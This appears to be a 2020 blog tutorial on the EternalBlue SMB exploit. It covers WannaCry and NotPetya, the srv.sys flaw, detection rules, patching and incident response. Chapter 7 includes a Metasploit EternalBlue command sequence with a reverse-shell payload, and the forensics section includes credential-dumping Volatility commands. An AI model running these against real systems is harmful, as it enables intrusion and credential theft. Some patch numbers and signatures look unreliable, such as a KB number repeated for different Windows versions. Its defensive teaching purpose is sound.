Thilan Dissanayaka Malware April 23, 2020

From NSA to WannaCry - The Story of EternalBlue

From NSA weapon to global cyber pandemic – understanding the exploit that changed cybersecurity forever

Introduction: The Digital Skeleton Key

Imagine if someone created a master key that could unlock any house in your neighborhood, then accidentally dropped it on the street for everyone to find. That’s essentially what happened with EternalBlue – a powerful cyber weapon developed by the NSA that leaked to the public and became the foundation for some of the most devastating cyberattacks in history.

This tutorial will take you through everything you need to know about EternalBlue: how it works, why it’s so dangerous, how to detect it, and most importantly, how to protect against it.

Chapter 1: Understanding the Fundamentals

What is EternalBlue?

EternalBlue is an exploit that targets a critical vulnerability in Microsoft’s Server Message Block (SMB) protocol. Think of SMB as the postal system for Windows computers – it’s how they send files, share printers, and communicate with each other on a network.

Key Facts:

• Official Designation: CVE-2017-0144
• Affected Protocol: SMBv1 (Server Message Block version 1)
• Vulnerability Type: Remote Code Execution via Buffer Overflow
• CVSS Score: 8.1 (High)
• First Discovered: Developed by NSA’s Equation Group around 2013
• Public Disclosure: April 14, 2017 (Shadow Brokers leak)

The SMB Protocol: Understanding the Target

Before diving into the exploit, let’s understand what SMB does and why it’s everywhere:

SMB’s Role in Windows Networks:

• File sharing between computers
• Printer sharing across the network
• Inter-process communication
• Network browsing and discovery
• Authentication and authorization services

SMB Versions and Evolution:

• SMBv1: Original protocol (1980s) - vulnerable to EternalBlue
• SMBv2: Introduced with Windows Vista (2006) - more secure
• SMBv3: Current version with Windows 8/Server 2012+ - encrypted by default

Why SMBv1 is Dangerous:

• Lacks proper input validation
• No encryption by default
• Designed in an era when security wasn’t a primary concern
• Still enabled by default on older Windows systems

Chapter 2: The Technical Deep Dive

How EternalBlue Works: Step-by-Step Breakdown

Understanding EternalBlue requires grasping several technical concepts. Let’s break it down:

Step 1: Target Identification

EternalBlue first scans for systems with SMB port 445 open:

Target Discovery Process:
1. Port scan for 445/tcp (SMB)
2. SMB protocol negotiation
3. Version identification (looking for SMBv1)
4. Vulnerability confirmation

Step 2: The Buffer Overflow Attack

The core of EternalBlue is a buffer overflow in how Windows processes SMB packets:

What’s a Buffer Overflow? Imagine a cup (buffer) designed to hold 8 ounces of water. If you pour 12 ounces, the extra 4 ounces spill everywhere. In computing, this "spillage" can overwrite critical memory locations.

EternalBlue’s Specific Attack:

1. Crafted SMB Packet: Creates a malformed SMB packet with specific characteristics
2. Memory Corruption: The packet causes Windows to write data beyond allocated memory boundaries
3. Code Injection: The overflow overwrites return addresses, redirecting program execution
4. Shellcode Execution: Attacker’s code runs with system-level privileges

Step 3: The Doublepulsar Implant

EternalBlue often works in conjunction with Doublepulsar, a backdoor implant:

Doublepulsar’s Function:

• Provides persistent access to compromised systems
• Allows remote code execution
• Operates stealthily in kernel mode
• Enables additional payload delivery

The Two-Stage Process:

1. Stage 1: EternalBlue exploits the vulnerability and gains initial access
2. Stage 2: Doublepulsar is installed for persistent backdoor access

The Vulnerability’s Root Cause

Let’s examine the actual vulnerability in technical terms:

The Flaw in srv.sys: The vulnerability exists in Windows’ srv.sys driver, which handles SMB requests:

// Simplified vulnerable code pattern
NTSTATUS SrvOs2FeaListSizeToNt(
    IN PFEALIST ServerFeaList,
    IN ULONG ServerFeaListSize,
    OUT PULONG NtFeaListSize
) {
    // Insufficient bounds checking here
    // Leads to integer overflow and buffer overflow
}

The Attack Vector:

1. SMB Tree Connect Request: Attacker sends specially crafted tree connect request
2. Extended Attribute Processing: Malformed extended attributes trigger the overflow
3. Memory Corruption: Overwrites adjacent memory structures
4. Control Flow Hijacking: Redirects execution to attacker-controlled code

Chapter 3: EternalBlue in the Wild - Case Studies

WannaCry: The Global Wake-Up Call

Timeline:

• May 12, 2017: WannaCry launches using EternalBlue
• First 24 hours: 200,000+ computers infected across 150+ countries
• Impact: Hospitals, railways, telecommunications, and government services disrupted

Technical Analysis: WannaCry combined EternalBlue with:

• Worm capabilities: Self-propagating across networks
• Ransomware payload: Encrypts files and demands payment
• Kill switch: Accidental domain registration stopped initial spread

NotPetya: The $10 Billion Disaster

Timeline:

• June 27, 2017: NotPetya launches via Ukrainian software update
• Propagation: Uses EternalBlue for lateral movement
• Global impact: Spreads beyond Ukraine to 60+ countries

Technical Differences from WannaCry:

• Supply chain initial infection: Started via software update, not email
• Destructive payload: Designed to destroy data, not hold it for ransom
• Multiple propagation methods: Combined EternalBlue with other techniques

BadRabbit and Other Variants

BadRabbit (October 2017):

• Used EternalBlue alongside other exploit methods
• Targeted Russia and Eastern Europe
• Demonstrated continued evolution of EternalBlue-based attacks

Chapter 4: Detection and Analysis Tutorial

Detecting EternalBlue Attacks

Network-Level Detection

Wireshark Analysis:

Detection Signatures:
1. SMB Tree Connect requests with abnormal extended attributes
2. Multiple failed SMB authentication attempts
3. Unusual SMB traffic patterns on port 445
4. Large SMB packets with malformed headers

Network Monitoring Commands:

# Monitor SMB traffic with tcpdump
tcpdump -i any port 445 -w smb_traffic.pcap

# Check for suspicious SMB connections
netstat -an | grep :445

# Monitor SMB logs in Windows
Get-WinEvent -FilterHashtable @{LogName=\"Microsoft-Windows-SMBServer/Security\"}

Host-Level Detection

Windows Event Log Analysis:

Key Event IDs to Monitor:
- Event ID 1000: Application crashes (potential exploitation)
- Event ID 4625: Failed logon attempts
- Event ID 4648: Explicit credential logon
- Event ID 5140: Network share access

Registry Indicators:

Suspicious Registry Locations:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SYSTEM\CurrentControlSet\Services
HKLM\SOFTWARE\Classes\Protocols\Handler

File System Artifacts:

Common Payload Locations:
C:\Windows\Temp\
C:\Windows\System32\
%APPDATA%\
Recycle Bin folders

Memory Analysis

Volatility Framework Commands:

# Basic memory analysis
volatility -f memory.raw --profile=Win7SP1x64 imageinfo

# Process analysis
volatility -f memory.raw --profile=Win7SP1x64 pslist
volatility -f memory.raw --profile=Win7SP1x64 psscan

# Network connections
volatility -f memory.raw --profile=Win7SP1x64 netscan

# Look for injected code
volatility -f memory.raw --profile=Win7SP1x64 malfind

Vulnerability Assessment

Scanning for EternalBlue Vulnerabilities

Nmap Scripts:

# Basic EternalBlue scan
nmap --script smb-vuln-ms17-010 -p 445 <target>

# Comprehensive SMB vulnerability scan
nmap --script smb-vuln* -p 445 <target>

# Check SMB version
nmap --script smb-protocols -p 445 <target>

Metasploit Auxiliary Modules:

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target_range>
set THREADS 10
run

PowerShell Vulnerability Check:

# Check if SMBv1 is enabled
Get-SmbServerConfiguration | Select EnableSMB1Protocol

# Check installed patches
Get-HotFix | Where-Object {$_.HotFixID -eq \"KB4013389\"}

# Check SMB shares
Get-SmbShare

Chapter 5: Comprehensive Defense Tutorial

Immediate Protection Steps

1. Patch Management

Critical Patches to Install:

• KB4013389: Windows 7/Server 2008 R2
• KB4013429: Windows 8.1/Server 2012 R2
• KB4013429: Windows 10/Server 2016

Automated Patch Verification:

# PowerShell script to check patch status
$patches = @(\"KB4013389\", \"KB4013429\", \"KB4012212\", \"KB4012215\")
foreach ($patch in $patches) {
    $installed = Get-HotFix | Where-Object {$_.HotFixID -eq $patch}
    if ($installed) {
        Write-Host \"$patch is installed\" -ForegroundColor Green
    } else {
        Write-Host \"$patch is NOT installed\" -ForegroundColor Red
    }
}

2. Disable SMBv1

Windows PowerShell Method:

# Disable SMBv1 server
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

# Disable SMBv1 client
sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc.exe config mrxsmb10 start= disabled

# Verify SMBv1 is disabled
Get-SmbServerConfiguration | Select EnableSMB1Protocol

Registry Method:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
\"SMB1\"=dword:00000000

Group Policy Method:

Computer Configuration > Administrative Templates > 
MS Security Guide > Configure SMBv1 server = Disabled

3. Network Segmentation

Firewall Rules:

# Block SMB traffic from internet
iptables -A INPUT -p tcp --dport 445 -s ! 192.168.0.0/16 -j DROP
iptables -A INPUT -p tcp --dport 139 -s ! 192.168.0.0/16 -j DROP

# Windows Firewall
netsh advfirewall firewall add rule name=\"Block SMB\" dir=in action=block protocol=TCP localport=445

Network Access Control (NAC):

Implementation Steps:
1. Deploy NAC solution (Cisco ISE, Aruba ClearPass, etc.)
2. Define device compliance policies
3. Create network segmentation rules
4. Implement dynamic VLAN assignment
5. Monitor and audit network access

Advanced Defense Strategies

1. Intrusion Detection and Prevention

Snort Rules for EternalBlue:

alert tcp any any -> any 445 (msg:\"EternalBlue SMB Exploit Attempt\"; content:\"|FF|SMB\"; depth:8; content:\"|2F 00 00 00 00 00|\"; distance:0; within:6; sid:1000001; rev:1;)

alert tcp any any -> any 445 (msg:\"Possible EternalBlue Tree Connect\"; content:\"SMB\"; depth:8; content:\"|75 00 00 00|\"; distance:0; within:4; sid:1000002; rev:1;)

Suricata Rules:

alert smb any any -> any any (msg:\"EternalBlue exploit attempt\"; flow:to_server; smb.version:1; content:\"|00 00 00 00 FF 53 4D 42|\"; sid:1000003;)

2. Application Whitelisting

AppLocker Configuration:

<RuleCollection Type=\"Exe\" EnforcementMode=\"Enabled\">
    <FilePathRule Id=\"fd686d83-a829-4351-8ff4-27c7de5755d2\" Name=\"(Default Rule) All files located in the Program Files folder\" Description=\"Allows members of the Everyone group to run applications that are located in the Program Files folder.\" UserOrGroupSid=\"S-1-1-0\" Action=\"Allow\">
        <FilePathCondition Path=\"%PROGRAMFILES%\*\"/>
    </FilePathRule>
</RuleCollection>

PowerShell Constrained Language Mode:

# Enable constrained language mode
$ExecutionContext.SessionState.LanguageMode = \"ConstrainedLanguage\"

# Group Policy setting
Computer Configuration > Administrative Templates > 
Windows Components > Windows PowerShell > 
Turn on PowerShell Script Block Logging = Enabled

3. Endpoint Detection and Response (EDR)

Sysmon Configuration for EternalBlue Detection:

<RuleGroup name=\"\" groupRelation=\"or\">
    <ProcessCreate onmatch=\"include\">
        <CommandLine condition=\"contains\">rundll32</CommandLine>
        <CommandLine condition=\"contains\">regsvr32</CommandLine>
        <CommandLine condition=\"contains\">powershell</CommandLine>
    </ProcessCreate>
    <NetworkConnect onmatch=\"include\">
        <DestinationPort condition=\"is\">445</DestinationPort>
    </NetworkConnect>
</RuleGroup>

Custom Detection Scripts:

# Python script to monitor for EternalBlue indicators
import psutil
import socket
import threading

def monitor_smb_connections():
    for conn in psutil.net_connections():
        if conn.laddr.port == 445 or conn.raddr and conn.raddr.port == 445:
            log_connection(conn)

def log_connection(conn):
    print(f\"SMB Connection: {conn.laddr} -> {conn.raddr} Status: {conn.status}\")

Recovery and Incident Response

1. Incident Response Playbook

Phase 1: Detection and Analysis

1. Confirm EternalBlue exploitation
   - Check for suspicious SMB traffic
   - Analyze system logs
   - Look for payload indicators

2. Determine scope of compromise
   - Identify affected systems
   - Map lateral movement
   - Assess data exposure

Phase 2: Containment and Eradication

1. Immediate containment
   - Isolate affected systems
   - Block SMB traffic at firewalls
   - Disable compromised accounts

2. Eradication steps
   - Remove malware payloads
   - Patch vulnerable systems
   - Update security controls

Phase 3: Recovery and Post-Incident

1. System recovery
   - Restore from clean backups
   - Verify system integrity
   - Update security configurations

2. Lessons learned
   - Document attack timeline
   - Update security procedures
   - Conduct security training

2. Forensic Analysis

Memory Dump Analysis:

# Acquire memory dump
DumpIt.exe /output memory.raw

# Analyze with Volatility
volatility -f memory.raw --profile=Win7SP1x64 hivelist
volatility -f memory.raw --profile=Win7SP1x64 hashdump
volatility -f memory.raw --profile=Win7SP1x64 lsadump

Disk Forensics:

# Create forensic image
dd if=/dev/sda of=evidence.img bs=4096 conv=noerror,sync

# Mount read-only
mount -o ro,loop evidence.img /mnt/evidence

# Timeline analysis
fls -r -m C: evidence.img > timeline.body
mactime -b timeline.body > timeline.csv

Chapter 6: Building Resilient Defenses

Defense-in-Depth Strategy

Layer 1: Network Perimeter

Components:
- Next-generation firewalls (NGFW)
- Intrusion prevention systems (IPS)
- Web application firewalls (WAF)
- DNS filtering and monitoring

Layer 2: Network Segmentation

Implementation:
- VLAN segmentation
- Micro-segmentation
- Software-defined perimeters (SDP)
- Zero-trust network architecture

Layer 3: Endpoint Protection

Technologies:
- Next-generation antivirus (NGAV)
- Endpoint detection and response (EDR)
- Application control and whitelisting
- Behavioral analysis and sandboxing

Layer 4: Identity and Access Management

Controls:
- Multi-factor authentication (MFA)
- Privileged access management (PAM)
- Identity governance and administration (IGA)
- Single sign-on (SSO) with risk-based authentication

Continuous Monitoring and Improvement

Security Operations Center (SOC) Setup

SIEM Configuration for EternalBlue Detection:

Use Cases:
1. Multiple failed SMB authentication attempts
2. Unusual lateral movement patterns
3. Suspicious process execution
4. Abnormal network traffic volumes
5. Known IOC matches

Key Performance Indicators (KPIs):

Metrics to Track:
- Mean Time to Detection (MTTD)
- Mean Time to Response (MTTR)
- Patch deployment time
- Vulnerability exposure window
- False positive rates

Threat Hunting

EternalBlue Hunting Queries:

-- Splunk query for suspicious SMB activity
index=network sourcetype=firewall dest_port=445
| stats count by src_ip dest_ip
| where count > 100

-- Windows Event Log query
index=wineventlog EventCode=5140
| eval share_name=if(match(Share_Name,\".*\\$\"),\"Admin Share\",\"Regular Share\")
| stats count by src_ip dest_ip share_name

YARA Rules for EternalBlue Payloads:

rule EternalBlue_Exploit {
    meta:
        description = \"Detects EternalBlue exploit code\"
        author = \"Security Analyst\"
        date = \"2023-01-01\"
    
    strings:
        $smb_header = { FF 53 4D 42 }
        $exploit_pattern = { 00 00 00 00 FF 53 4D 42 72 00 00 00 00 18 01 20 }
        
    condition:
        $smb_header and $exploit_pattern
}

Chapter 7: Testing and Validation

Penetration Testing

Ethical EternalBlue Testing

Testing Framework:

1. Scope definition and authorization
2. Vulnerability assessment
3. Exploit validation (controlled)
4. Impact assessment
5. Remediation verification

Metasploit Testing Module:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

Custom Python Test Script:

#!/usr/bin/env python3
import socket
import struct

def check_eternalblue_vuln(target_ip):
    \"\"\"
    Safe vulnerability check (no exploitation)
    \"\"\"
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, 445))
        
        # Send SMB negotiate request
        negotiate = b'\x00\x00\x00\x85\xffSMBr\x00\x00\x00\x00\x18\x01\x20'
        sock.send(negotiate)
        
        response = sock.recv(1024)
        if b'SMB' in response:
            print(f\"[+] {target_ip}: SMB service detected\")
            return check_smb_version(sock)
        else:
            print(f\"[-] {target_ip}: No SMB service\")
            return False
            
    except Exception as e:
        print(f\"[-] {target_ip}: Connection failed - {e}\")
        return False
    finally:
        sock.close()

def check_smb_version(sock):
    \"\"\"
    Check if SMBv1 is enabled (vulnerable version)
    \"\"\"
    # Implementation would go here
    # This is a simplified example
    return True

Blue Team Exercises

Tabletop Exercises

Scenario: EternalBlue Incident Response

Scenario Setup:
- Multiple systems showing signs of EternalBlue exploitation
- Lateral movement detected across network segments
- Critical business systems affected
- External communications about potential data breach

Exercise Objectives:
1. Test incident response procedures
2. Evaluate communication protocols
3. Assess technical containment capabilities
4. Review recovery procedures

Red Team vs Blue Team

Attack Simulation:

Red Team Actions:
1. Initial reconnaissance
2. EternalBlue exploitation
3. Lateral movement
4. Persistence establishment
5. Data exfiltration simulation

Blue Team Response:
1. Detection and alerting
2. Incident classification
3. Containment actions
4. Forensic analysis
5. Recovery operations

Chapter 8: Future-Proofing Against Similar Threats

Emerging Threats and Evolution

Next-Generation SMB Exploits

Potential Future Risks:
- SMBv2/v3 vulnerabilities
- Supply chain attacks via SMB
- AI-powered exploitation tools
- Zero-day exploit chains

Advanced Persistent Threats (APTs)

Evolution Patterns:
- Living-off-the-land techniques
- Fileless malware deployment
- Cloud infrastructure targeting
- Supply chain compromises

Adaptive Security Architecture

Zero Trust Implementation

Core Principles:
1. Never trust, always verify
2. Assume breach mentality
3. Verify explicitly
4. Use least privilege access
5. Segment access zones

AI-Powered Defense

Technologies:
- Machine learning threat detection
- Behavioral analysis engines
- Automated incident response
- Predictive threat modeling

Conclusion: Mastering EternalBlue Defense

EternalBlue represents a watershed moment in cybersecurity history. This exploit demonstrated how a single vulnerability could cascade into global chaos, affecting hospitals, shipping companies, and critical infrastructure worldwide.

Key Takeaways

Technical Lessons:

• The importance of timely patch management
• Network segmentation as a critical defense
• The power of wormable exploits in interconnected environments
• The need for comprehensive security monitoring

Strategic Lessons:

• Cybersecurity is a business-critical function
• International cooperation is essential for cyber defense
• Supply chain security cannot be overlooked
• Incident response planning must be proactive, not reactive

Your Action Plan

1. Immediate Actions:
   • Audit systems for SMBv1 usage
   • Verify critical security patches are installed
   • Implement network segmentation
   • Deploy comprehensive monitoring
2. Medium-term Goals:
   • Establish vulnerability management program
   • Implement zero-trust architecture
   • Develop incident response capabilities
   • Conduct regular security testing
3. Long-term Strategy:
   • Build adaptive security architecture
   • Invest in threat intelligence capabilities
   • Develop security awareness culture
   • Prepare for emerging threats

The story of EternalBlue is far from over. As cyber threats continue to evolve, the lessons learned from this exploit will continue to shape how we approach cybersecurity. By understanding the technical details, implementing comprehensive defenses, and maintaining vigilant monitoring, we can build resilient systems that can withstand the next digital pandemic.

Remember: In cybersecurity, the cost of prevention is always less than the cost of recovery. EternalBlue taught us this lesson at a global scale – make sure your organization doesn’t have to learn it the hard way.

---

Stay vigilant, stay updated, and most importantly, stay one step ahead of the attackers.